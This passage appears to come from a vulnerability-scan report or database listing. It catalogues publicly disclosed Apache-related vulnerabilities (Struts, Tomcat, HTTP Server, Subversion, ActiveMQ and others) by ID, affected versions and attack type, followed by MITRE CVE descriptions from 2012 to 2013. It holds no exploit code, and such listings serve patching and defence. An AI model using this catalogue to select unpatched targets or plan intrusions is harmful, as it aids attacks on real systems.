| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
| [4882] Apache Wicket up to 1.5.4 directory traversal
| [4881] Apache Wicket up to 1.4.19 cross site scripting
| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
| [60352] Apache Struts up to 2.2.3 memory corruption
| [60153] Apache Portable Runtime up to 1.4.3 denial of service
| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
| [4571] Apache Struts up to 2.3.1.2 privilege escalation
| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
| [59888] Apache Tomcat up to 6.0.6 denial of service
| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
| [59850] Apache Geronimo up to 2.2.1 denial of service
| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
| [58413] Apache Tomcat up to 6.0.10 spoofing
| [58381] Apache Wicket up to 1.4.17 cross site scripting
| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
| [57568] Apache Archiva up to 1.3.4 cross site scripting
8499| [57567] Apache Archiva up to 1.3.4 cross site request forgery
8500| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
8501| [4355] Apache HTTP Server APR apr_fnmatch denial of service
8502| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
8503| [57425] Apache Struts up to 2.2.1.1 cross site scripting
8504| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
8505| [57025] Apache Tomcat up to 7.0.11 information disclosure
8506| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
8507| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
8508| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
8509| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
8510| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
8511| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
8512| [56512] Apache Continuum up to 1.4.0 cross site scripting
8513| [4285] Apache Tomcat 5.x JVM getLocale denial of service
8514| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
8515| [4283] Apache Tomcat 5.x ServletContect privilege escalation
8516| [56441] Apache Tomcat up to 7.0.6 denial of service
8517| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
8518| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
8519| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
8520| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
8521| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
8522| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
8523| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
8524| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
8525| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
8526| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
8527| [54693] Apache Traffic Server DNS Cache unknown vulnerability
8528| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
8529| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
8530| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
8531| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
8532| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
8533| [54012] Apache Tomcat up to 6.0.10 denial of service
8534| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
8535| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
8536| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
8537| [52894] Apache Tomcat up to 6.0.7 information disclosure
8538| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
8539| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
8540| [52786] Apache Open For Business Project up to 09.04 cross site scripting
8541| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
8542| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
8543| [52584] Apache CouchDB up to 0.10.1 information disclosure
8544| [51757] Apache HTTP Server 2.0.44 cross site scripting
8545| [51756] Apache HTTP Server 2.0.44 spoofing
8546| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
8547| [51690] Apache Tomcat up to 6.0 directory traversal
8548| [51689] Apache Tomcat up to 6.0 information disclosure
8549| [51688] Apache Tomcat up to 6.0 directory traversal
8550| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
8551| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
8552| [50626] Apache Solr 1.0.0 cross site scripting
8553| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
8554| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
8555| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
8556| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
8557| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
8558| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
8559| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
8560| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
8561| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
8562| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
8563| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
8564| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
8565| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
8566| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
8567| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
8568| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
8569| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
8570| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
8571| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
8572| [47214] Apachefriends xampp 1.6.8 spoofing
8573| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
8574| [47162] Apachefriends XAMPP 1.4.4 weak authentication
8575| [47065] Apache Tomcat 4.1.23 cross site scripting
8576| [46834] Apache Tomcat up to 5.5.20 cross site scripting
8577| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
8578| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
8579| [86625] Apache Struts directory traversal
8580| [44461] Apache Tomcat up to 5.5.0 information disclosure
8581| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
8582| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
8583| [43663] Apache Tomcat up to 6.0.16 directory traversal
8584| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
8585| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
8586| [43516] Apache Tomcat up to 4.1.20 directory traversal
8587| [43509] Apache Tomcat up to 6.0.13 cross site scripting
8588| [42637] Apache Tomcat up to 6.0.16 cross site scripting
8589| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
8590| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
8591| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
8592| [40924] Apache Tomcat up to 6.0.15 information disclosure
8593| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
8594| [40922] Apache Tomcat up to 6.0 information disclosure
8595| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
8596| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
8597| [40656] Apache Tomcat 5.5.20 information disclosure
8598| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
8599| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
8600| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
8601| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
8602| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
8603| [40234] Apache Tomcat up to 6.0.15 directory traversal
8604| [40221] Apache HTTP Server 2.2.6 information disclosure
8605| [40027] David Castro Apache Authcas 0.4 sql injection
8606| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
8607| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
8608| [3414] Apache Tomcat WebDAV Stored privilege escalation
8609| [39489] Apache Jakarta Slide up to 2.1 directory traversal
8610| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
8611| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
8612| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
8613| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
8614| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
8615| [38524] Apache Geronimo 2.0 unknown vulnerability
8616| [3256] Apache Tomcat up to 6.0.13 cross site scripting
8617| [38331] Apache Tomcat 4.1.24 information disclosure
8618| [38330] Apache Tomcat 4.1.24 information disclosure
8619| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
8620| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
8621| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
8622| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
8623| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
8624| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
8625| [37292] Apache Tomcat up to 5.5.1 cross site scripting
8626| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
8627| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
8628| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
8629| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
8630| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
8631| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
8632| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
8633| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
8634| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
8635| [36225] XAMPP Apache Distribution 1.6.0a sql injection
8636| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
8637| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
8638| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
8639| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
8640| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
8641| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
8642| [34252] Apache HTTP Server denial of service
8643| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
8644| [33877] Apache Opentaps 0.9.3 cross site scripting
8645| [33876] Apache Open For Business Project unknown vulnerability
8646| [33875] Apache Open For Business Project cross site scripting
8647| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
8648| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
8649|
8650| MITRE CVE - https://cve.mitre.org:
8651| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
8652| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
8653| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
8654| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
8655| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
8656| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
8657| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
8658| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
8659| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
8660| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
8661| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
8662| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
8663| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
8664| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
8665| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
8666| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
8667| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
8668| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
8669| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
8670| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
8671| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
8672| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
8673| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
8674| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
8675| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
8676| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
8677| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
8678| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
8679| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
8680| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
8681| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8682| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
8683| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
8684| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
8685| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
8686| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
8687| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
8688| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
8689| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
8690| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
8691| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
8692| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
8693| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
8694| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
8695| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
8696| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
8697| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
8698| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
8699| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
8700| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
8701| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
8702| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
8703| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
8704| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
